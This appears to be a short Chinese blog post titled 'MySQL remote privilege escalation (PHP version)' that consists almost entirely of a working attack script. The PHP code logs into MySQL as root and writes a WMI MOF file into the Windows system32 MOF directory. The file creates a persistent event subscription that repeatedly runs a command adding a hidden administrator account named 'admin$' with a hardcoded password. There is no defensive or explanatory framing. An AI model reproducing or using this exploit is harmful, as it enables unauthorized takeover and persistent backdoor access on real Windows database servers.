0

MySQL远程提权php版

已有 3,372 人阅读此文 - -
<?php

$mysql_server_name='localhost';
$mysql_username='root';
$mysql_password='';
$mysql_database='mysql';
$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password,$mysql_database);
$cmdshell="net user admin$ qwe!@#123qwe /add";
$payload = "#pragma namespace(\"\\\\\\\\.\\\\root\\\\subscription\")

instance of __EventFilter as \$EventFilter
{
EventNamespace = \"Root\\\\Cimv2\";
Name = \"filtP2\";
Query = \"Select * From __InstanceModificationEvent \"
\"Where TargetInstance Isa \\\"Win32_LocalTime\\\" \"
\"And TargetInstance.Second = 5\";
QueryLanguage = \"WQL\";
};

instance of ActiveScriptEventConsumer as \$Consumer
{
Name = \"consPCSV2\";
ScriptingEngine = \"JScript\";
ScriptText =
\"var WSH = new ActiveXObject(\\\"WScript.Shell\\\")\\nWSH.run(\\\"$cmdshell\\\")\";
};

instance of __FilterToConsumerBinding
{
Consumer = \$Consumer;
Filter = \$EventFilter;
};";
mysql_select_db($mysql_database,$conn);
$sql="select '$payload' into outfile 'c:/windows/system32/wbem/mof/nullevt.mof';";
$result=mysql_query($sql);
mysql_close($conn);
?>
0
相关文章!